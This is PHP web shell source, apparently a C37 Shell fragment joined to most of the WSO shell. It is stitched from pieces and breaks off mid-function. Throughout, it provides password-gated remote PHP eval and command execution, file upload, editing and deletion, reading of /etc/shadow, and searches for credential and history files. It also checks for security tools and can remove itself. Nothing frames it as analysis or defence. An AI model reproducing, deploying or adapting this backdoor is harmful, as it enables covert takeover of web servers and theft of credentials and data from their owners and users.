Server IP: ',$_SERVER['SERVER_ADDR'], ' - Host: ',gethostbyaddr($_SERVER['SERVER_ADDR']), '
Port: ',$_SERVER['SERVER_PORT'], ' - Admin: ',$_SERVER['SERVER_ADMIN']; $T = array('Bytes','KiB','MiB','GiB','TiB','PiB','EiB','ZiB','YiB'); $i = 0; $B = diskfreespace($CDIR); $A = disk_total_space($CDIR); while ($B>=1024) { $B/=1024;++$i; } $Space1=$T[$i]; $i = 0; while ($A>=1024) { $A/=1024;++$i; } $Space2=$T[$i]; printf('

Free Disk Space: %.3f %s Out of %.3f %s (%.2f%%)',$B,$Space1,$A,$Space2,($B/$A) * 100); array_shift($T); echo '

Enter ['; } else { echo ' color="green">'; } echo $A.']
'; echo '
C37 Shell
Back Forward [
Home] [Search] [Encoder] [Eval] [Mail] [Hash Analyzer]'; /* [SQL Man.] */ echo ' [Deface & Infect] [Replicate] '; /* [Proxy] */ echo '[Password] [Remove Shell]



',"\r\n"; if ($IsAction) { if ($_GET['action'] === 'eval') { if (isset($_REQUEST['code'])) { $NA = substr($_REQUEST['code'], 0, 2); if (substr($_REQUEST['code'], 0, 5) === '' || $ND === '%>') { $_REQUEST['code'] = substr($_REQUEST['code'], 0, -2); } } if (isset($_POST['highlight']) && (function_exists('highlight_string') || function_exists('show_source'))) { echo '

Highlighted code:

'; if (function_exists('highlight_string')) { highlight_string(""); } else { show_source(""); } echo '
'; } if (isset($_REQUEST['code']) && !isset($_POST['textarea'])) { echo '
',eval($_REQUEST['code']),'
'; } else { echo '

PHP Code'; if (isset($_REQUEST['code'])) { echo ' Results'; } echo ':


'; } else { echo ''; } echo '

Results in TextArea? '; if (function_exists('highlight_string') || function_exists('show_source')) { echo ' Highlight code '; } echo '


If you don\'t see any output from the script when you should, please check it for Errors.'; } } elseif ($_GET['action'] === 'file' && $ShowFiles) { if (is_file($_GET['file']) || ($_REQUEST['act'] === 'chmod' && is_dir($_GET['file']))) { if (!function_exists('file_get_contents')) { function file_get_contents($File) { $handle = fopen($File, 'rb'); $contents = fread($handle,sprintf('%u',filesize($File))); fclose($handle); return $contents; } } if (isset($_REQUEST['act'])) { if ($_REQUEST['act'] === 'rename') { if (isset($_REQUEST['name'])) { echo 'File Renaming - Was Successful.'; } else { echo 'color="red">Failed.'; } echo ''; } else { echo '

Rename\Move \'',htmlspecialchars($_GET['file']),'\' To:

'; } } elseif ($_GET['act'] === 'stat') { $Stat = stat($_GET['file']); echo '

',htmlspecialchars($_GET['file']),'

Device Number ',$Stat['dev'],'
Inode Number ',$Stat['ino'],'
Inode protection mode ',$Stat['mode'],'
Number of Links ',$Stat['nlink'],'
User ID ',$Stat['uid'],'
Group ID ',$Stat['gid'],'
Device type, if inode device ',$Stat['rdev'],'
Size in Bytes ',$Stat['size'],'
Time of last access ',$Stat['atime'],' (',date('F d Y H:i:s.',$Stat['atime']),')
Time of last modification ',$Stat['mtime'],' (',date('F d Y H:i:s.',$Stat['mtime']),')
Time of last inode change ',$Stat['ctime'],' (',date('F d Y H:i:s.',$Stat['ctime']),')
Blocksize of filesystem IO ',$Stat['blksize'],'
Number of 512-byte blocks allocated ',$Stat['blocks'],'
'; } elseif ($_GET['act'] === 'chmod') { if (isset($_POST['Perms'])) { echo 'Changed File permissions - successfully (new file permissions: ',substr(sprintf('%o',fileperms($_REQUEST['file'])),-3),').'; } else { echo 'color="red">unsuccessfully.'; } echo ''; } else { $Permissions = substr(sprintf('%o',fileperms($_REQUEST['file'])),-3); echo '

Change \'',htmlspecialchars($_GET['file']),'\' Permissions to:


rwx
Owner:= '4') { echo ' checked="checked"'; } echo ' />= '6') { echo ' checked="checked"'; } echo ' />
Group:= '4') { echo ' checked="checked"'; } echo ' />= '6') { echo ' checked="checked"'; } echo ' />
Others:= '4') { echo ' checked="checked"'; } echo ' />= '6') { echo ' checked="checked"'; } echo ' />

On Windows, The only permissions allowed for files are 666&444.
666 for writeable\readable and 444 for readable.
'; } } elseif ($_GET['act'] === 'delete') { if (unlink($_REQUEST['file'])) { echo '\'',htmlspecialchars($_REQUEST['file']),'\' was successfully Deleted.'; } else { echo 'Error while deleting file.
';GetLastError(); }} elseif ($_GET['act'] === 'copy') { if (isset($_REQUEST['dest'])) { if (copy($_REQUEST['file'],$_REQUEST['dest'])) { echo 'File was copied successfully from \'',realpath($_REQUEST['file']),'\' to \'',$_REQUEST['dest'],'\'.'; } else { echo 'Error while copying file.
';GetLastError(); } } else { echo '

Copy \'',htmlspecialchars($CDIR.$_REQUEST['file']),'\' to file:



Warning: If the destination file already exists, it will be overwritten.'; } } elseif ($_GET['act'] === 'chown') { if (isset($_POST['Owner'])) { echo 'Changing File Owner - Was successful.'; } else { echo 'color="red">Failed.';GetLastError(); } } else { echo '

Change \'',htmlspecialchars($_GET['file']),'\' Owner to:


Only the superuser may change the owner of a file.'; } } elseif ($_GET['act'] === 'chgrp') { if (isset($_POST['Group'])) { echo 'Changing File Group - Was successful.'; } else { echo 'color="red">Failed.';GetLastError(); } } else { echo '

Change \'',htmlspecialchars($_GET['file']),'\' Group to:


Only the superuser may change the group of a file arbitrarily;
other users may change the group of a file to any group of which that user is a member.'; } } elseif ($_GET['act'] === 'touch') { if (isset($_POST['Touch'])) { $TOUCH = FALSE; echo 'Changing File Time - Was successful.'; } else { echo 'color="red">Failed.';GetLastError(); } } else { echo '

Change \'',htmlspecialchars($_GET['file']),'\' Time to:





Use UNIX Timestamp
To change file modification\access time of the file, Just leave the corresponding box with it\'s default value.'; } } elseif ($_GET['act'] === 'base64') { echo '

',htmlspecialchars($_GET['file']),' Base64 Encoded:


'; } elseif ($_GET['act'] === 'compress') { if (isset($_POST['aname']) && isset($_POST['atype'])) { if ($_POST['atype'] === 'ZIP') { $Zip = new ZipArchive; $ArchiveName = $_POST['aname']; while (file_exists($ArchiveName.'.zip')) { $ArchiveName .= '7'; } $Zip->open($ArchiveName.'.zip',ZIPARCHIVE::CREATE); if ($Zip->addFile($_GET['file'])) { echo 'Compressed successfully, archive: ',htmlspecialchars($ArchiveName),'.zip'; } else { echo 'Could not compress file.'; } $Zip->close(); } elseif ($_POST['atype'] === 'Bzip2') { $ArchiveName = $_POST['aname']; while (file_exists($ArchiveName.'.bz2')) { $ArchiveName .= '7'; } $Handle = bzopen($ArchiveName.'.bz2','w'); if (bzwrite($Handle,file_get_contents($_GET['file'])) !== FALSE) { echo 'Compressed successfully, archive: ',htmlspecialchars($ArchiveName),'.bz2'; } else { echo 'Could not compress file.'; } bzclose($Handle); } elseif ($_POST['atype'] === 'Gzip') { $ArchiveName = $_POST['aname']; while (file_exists($ArchiveName.'.gz')) { $ArchiveName .= '7'; } $Handle = gzopen($ArchiveName.'.gz','w'); if (gzwrite($Handle,file_get_contents($_GET['file'])) !== FALSE) { echo 'Compressed successfully, archive: ',htmlspecialchars($ArchiveName),'.gz'; } else { echo 'Could not compress file.'; } gzclose($Handle); } } echo '

Compress ',htmlspecialchars($_GET['file']),':


Create a
"); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '[ '.$k.' ]'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\')) $drives .= '[ '.$drive.' ] '; } echo '' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } function wsoScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "n") === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '
posix_getpwuid ("Read" /etc/passwd)
From
To
'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ""; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid)."n"; } echo '
'; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "nrt\'") . "';n"; echo strlen($temp), "n", $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('
'; } echo '

Execution PHP-code

'; echo ' send using AJAX
';
	if(!empty($_POST['p1'])) {
		ob_start();
		eval($_POST['p1']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo '
'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '

File manager

'; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can't open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g('FilesMan',''.$f['path'].'');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
 "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name:  "; echo "
"; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"nrt\'")."';n"; echo strlen($temp), "n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo '

String conversions

'; echo "
send using AJAX
";
	if(!empty($_POST['p1'])) {
		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
	}
	echo"

Search files:

Text:
Path:
Name:
"; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo "".htmlspecialchars($item)."
"; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo "

Search for hash:





"; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } wsoHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
